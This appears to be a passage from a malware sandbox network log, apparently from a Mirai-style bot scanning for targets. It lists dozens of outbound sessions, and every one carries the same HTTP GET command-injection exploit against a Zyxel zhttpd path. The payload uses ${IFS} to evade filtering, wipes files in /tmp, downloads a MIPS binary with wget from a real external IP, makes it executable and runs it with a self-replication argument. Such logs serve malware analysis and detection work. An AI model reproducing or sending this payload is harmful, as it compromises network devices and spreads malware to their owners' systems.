                                      Jan 19, 2024 17:28:38.238913059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      83192.168.2.144784050.185.22.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.238970041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      84192.168.2.145252288.233.207.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.239043951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      85192.168.2.1437556173.107.62.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.239142895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      86192.168.2.14373461.173.17.201443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.239200115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      87192.168.2.1443606222.93.14.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.239285946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      88192.168.2.143576289.150.127.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.239326954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      89192.168.2.145992650.68.226.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.239406109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      90192.168.2.1447694211.144.253.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.239510059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      91192.168.2.1443588123.203.242.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.239572048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      92192.168.2.1449268162.4.73.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.239636898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      93192.168.2.1438130139.226.4.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.239722967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      94192.168.2.145879658.15.56.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.239768028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      95192.168.2.144550854.216.75.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.239834070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      96192.168.2.145553296.25.196.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.239886045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      97192.168.2.1438320113.190.62.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.239928961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      98192.168.2.1440928177.119.98.244443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.239989996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      99192.168.2.144555247.9.87.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.240061045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      100192.168.2.1437034173.22.105.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.240156889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      101192.168.2.1435922194.175.12.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.240201950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      102192.168.2.143599860.12.80.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.240288973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      103192.168.2.1460460201.166.217.76443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.240371943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      104192.168.2.144962841.242.98.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.240441084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      105192.168.2.143579858.248.23.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.240540981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      106192.168.2.144937020.246.97.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.240622044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      107192.168.2.1447642154.142.176.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.240706921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      108192.168.2.1453146161.107.170.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.240772963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      109192.168.2.1445696178.152.54.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.240855932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      110192.168.2.1445710184.17.215.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.240899086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      111192.168.2.145192627.169.203.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.241015911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      112192.168.2.1441192110.215.149.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.241086006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      113192.168.2.143572481.171.227.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.241142035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      114192.168.2.1434000207.41.149.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.241168976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      115192.168.2.1451380172.58.64.32443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.241221905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      116192.168.2.1437010223.134.103.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.241271019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      117192.168.2.1439048129.146.170.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.241338968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      118192.168.2.143800258.13.118.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.241415977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      119192.168.2.1452930176.36.216.187443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.241517067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      120192.168.2.1451996182.118.95.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.241556883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      121192.168.2.1441138219.236.65.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.241589069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      122192.168.2.1439672149.118.164.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.241662979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      123192.168.2.1449508223.181.44.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.241717100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      124192.168.2.1457620159.115.100.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.241756916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      125192.168.2.145318458.104.47.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.241782904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      126192.168.2.1442904141.146.16.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.241837978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      127192.168.2.143997048.41.100.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.241878986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      128192.168.2.145055491.160.74.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.241955996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      129192.168.2.1446604140.153.228.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.242037058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      130192.168.2.1447382219.246.156.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.242078066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      131192.168.2.1444870183.40.136.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.242121935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      132192.168.2.1437182191.147.71.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.242156029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      133192.168.2.1443326118.254.197.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.242230892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      134192.168.2.145488218.141.52.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.242259026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      135192.168.2.1438792169.158.254.90443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.242296934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      136192.168.2.145197258.41.252.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.242381096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      137192.168.2.1433252199.206.125.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.242468119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      138192.168.2.145044650.103.114.251443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.242516994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      139192.168.2.146020813.0.115.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.242554903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      140192.168.2.1440860134.26.23.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.242628098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      141192.168.2.143786496.13.228.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.242672920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      142192.168.2.143659012.224.14.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.242726088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      143192.168.2.1459456201.237.113.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.242775917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      144192.168.2.144160837.28.35.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.242871046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      145192.168.2.145215252.248.123.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:28:38.242934942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      146192.168.2.144944470.210.115.131443
                                      TimestampBytes transferredDirectionData
